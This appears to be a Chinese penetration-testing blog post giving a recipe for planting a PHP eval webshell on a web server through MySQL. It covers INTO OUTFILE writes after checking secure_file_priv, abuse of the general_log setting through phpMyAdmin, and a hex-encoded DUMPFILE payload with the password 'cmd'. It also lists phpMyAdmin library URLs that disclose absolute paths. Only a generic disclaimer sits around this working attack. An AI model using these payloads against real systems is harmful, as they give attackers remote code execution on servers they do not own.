-mysql 写入一句话|IT2021科技站

2019年8月3日 23:18:34渗透测试评论8,0561字数 1164阅读3分52秒阅读模式

mysql 写入一句话
方法一：

1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启         如果：  secure_file_priv NULL 值为 null 说明禁止状态，无法导出为文件，需要修改MySQL配置文件：查看是否有 secure_file_priv =  ，没有的话添加上             如果为一个目录，如：secure_file_priv = /home 那就只能导出到指定的目录，子目录也不行             如果为为空,如 secure_file_priv = ，说明可以导出到任意位置，注意等号一定要有 2、写入：     select '<?php eval($_POST[kill]);?>'  into outfile 'E:/phpStudy/PHPTutorial/WWW/kill1.php';     导出的木马文件一定要在可执行的目录下，如果有phpinfo.php文件，可以确认一下；

方法二：

如果可以进入PHPmyadmin，但是无法导出文件，这时，可以进入变量， 搜索  general logOFF --这个默认是off，关闭的，把它打开     general log file --设置日志文件及位置          然后执行查询 select "<?php eval($_POST['hacker']);?>"     就可以连接日志文件了

补充：还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话密码为 cmd
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -

http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/database_interface.lib.php http://target/phpmyadmin/libraries/db_table_exists.lib.php  http://target/phpmyadmin/libraries/display_export.lib.php http://target/phpmyadmin/libraries/header_meta_style.inc.php    http://target/phpmyadmin/libraries/mcrypt.lib.php

http://www.oniont.cn/index.php/archives/85.html

免责声明：本站某些文章、信息、图片、软件等来源于互联网，由本网整理发表，希望传递更多信息和学习之目的，并不意味赞同起观点或证实其内容的真实性以及非法用途。如设计、版权等问题，请立即联系管理员，我们会给予更改或删除相关文章，保证您的权利。

mysql 写入一句话

对某菠菜的渗透测试笔记

AtlasReaper：一款针对Confluence和Jira的网络侦查工具

CVE-2023-21839：Weblogic反序列化漏洞

干货|可别小看了XSS漏洞

venom的powershell免杀技术分析

Android App渗透测试–Drozer（实战篇）

Android App渗透测试–Drozer（安装篇）

ApacheTomcat CVE-2020-1938 Ghostcat高危文件读取/包含漏洞复现

常见的恶意payload

红队备忘录 – Windows凭证获取

发表评论